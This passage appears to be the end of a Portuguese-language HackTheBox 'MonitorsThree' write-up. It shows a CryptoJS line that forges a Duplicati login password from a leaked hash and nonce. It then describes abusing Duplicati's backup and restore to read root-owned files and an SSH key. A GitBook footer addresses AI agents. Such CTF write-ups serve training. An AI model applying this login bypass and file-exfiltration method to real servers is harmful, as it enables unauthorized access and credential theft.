var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('dRRA/DU+SN0RiGJJR+xk3ifqZNFA67+VwTCC1PIK3R0=') + saltedpwd)).toString(CryptoJS.enc.Base64);
```

{% endcode %}

**Exibição do resultado**:

```javascript
console.log(noncedpwd);
```

<figure><img src="/files/81afd87cc23584aa675730ebaf1e8fb7a52ec6fa" alt=""><figcaption></figcaption></figure>

A senha gerada (`noncedpwd`) é:

`bx8guiLaAag+uz6Ud+HRnu9mAb/kmzQB37Ht6e8WisA=`

#### Injeção e operação da senha

1. Copie e cole a senha calculada.
2. Use **Ctrl + U** para codificá-la em URL.

<figure><img src="/files/dfde03a416c48e4ea46a6957326cd4ae0fc34c3a" alt=""><figcaption></figcaption></figure>

3. Clique **Avançar** novamente para concluir a operação.

### Leitura de arquivos de backup do Duplicati

<figure><img src="/files/e4233c99c5fcccea359e2df7d56a72e2e069bbaf" alt=""><figcaption></figcaption></figure>

Agora que temos acesso ao **painel de administração do Duplicati**, criaremos um novo backup com o objetivo de exfiltrar a **SSH** chave.

<figure><img src="/files/9b043771f25dd174e386f2dfb3bb6ae820ce42d7" alt=""><figcaption></figcaption></figure>

**Análise da configuração do Docker**/ Ao observar o `docker-compose.yml` arquivo, encontramos que os arquivos estão armazenados no **origem** diretório do sistema hospedeiro, montado no contêiner.

<figure><img src="/files/66aba206e5ddd7aace0544dee8278b0e9db82f07" alt="" width="541"><figcaption></figcaption></figure>

**Seleção do diretório de destino**/ Para garantir acesso aos arquivos sensíveis, definimos o destino do **backup** nesse diretório selecionando:

* **Arquivo de origem**: `/source/home/marcus/`

<figure><img src="/files/f0273b7a6321e3aad207db96a2e88071907224d1" alt="" width="563"><figcaption></figcaption></figure>

* **Dados de origem:** `source/root/`

<figure><img src="/files/ae94f883ed933dd3149806aa254301abda67ff37" alt=""><figcaption></figcaption></figure>

**Finalização da configuração**

* Salvar configuração.

<figure><img src="/files/10c21e4e5927fc66c7753bced30f0b2db6d48765" alt=""><figcaption></figcaption></figure>

* Execute **Salvar** para recuperar os arquivos-alvo.

<figure><img src="/files/b51087bfcf170dc7e4793c118c95098b2f5c928e" alt=""><figcaption></figcaption></figure>

### Extração dos arquivos salvos

Após a execução do **backup**, três arquivos ZIP são gerados.

<div data-full-width="true"><figure><img src="/files/d1db8891020e5c00a9b547f457956c5eed658734" alt=""><figcaption></figcaption></figure></div>

* **Acesso aos arquivos**
  * Uma tentativa de abrir os arquivos diretamente falha devido a restrições de acesso.
  * No entanto, via **Duplicati**, usamos **Restaurar arquivos** opção para recuperar o conteúdo.

<figure><img src="/files/5a8116e71a185ab464c7891ed84d87c816fc45ad" alt=""><figcaption></figcaption></figure>

**Restaurar e exfiltrar**

* Extraia arquivos do backup.

<figure><img src="/files/3ebabe2204c2199a8ea8355dca4bfcb33b2bf96f" alt=""><figcaption></figcaption></figure>

Seleção da pasta **`/source/home/marcus/`** como fonte de restauração.

<figure><img src="/files/2abb809181020e43afefdcfd97b61f9fb7fb88be" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/648705f76bda726fe1541e3bff0c0fdb9e8b89ab" alt="" width="563"><figcaption></figcaption></figure>

### Flag root.txt :)

Após a restauração, exploramos os arquivos e descobrimos **`root.txt`**!

<figure><img src="/files/213bc3d7e76ed8172206503f3100c1a8bdd9b447" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5d469e05372e1968b5e7d9709efaceb3c6cb5801" alt="" width="524"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/writeups-ctf/hackthebox/linux-medium/monitorsthree-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
